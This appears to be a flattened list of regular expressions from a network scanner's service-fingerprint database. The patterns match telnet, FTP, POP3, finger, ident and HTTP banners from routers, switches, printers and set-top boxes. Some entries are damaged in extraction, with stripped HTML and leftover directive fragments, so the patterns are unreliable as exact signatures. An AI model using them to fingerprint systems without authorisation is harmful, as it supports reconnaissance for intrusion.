+\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

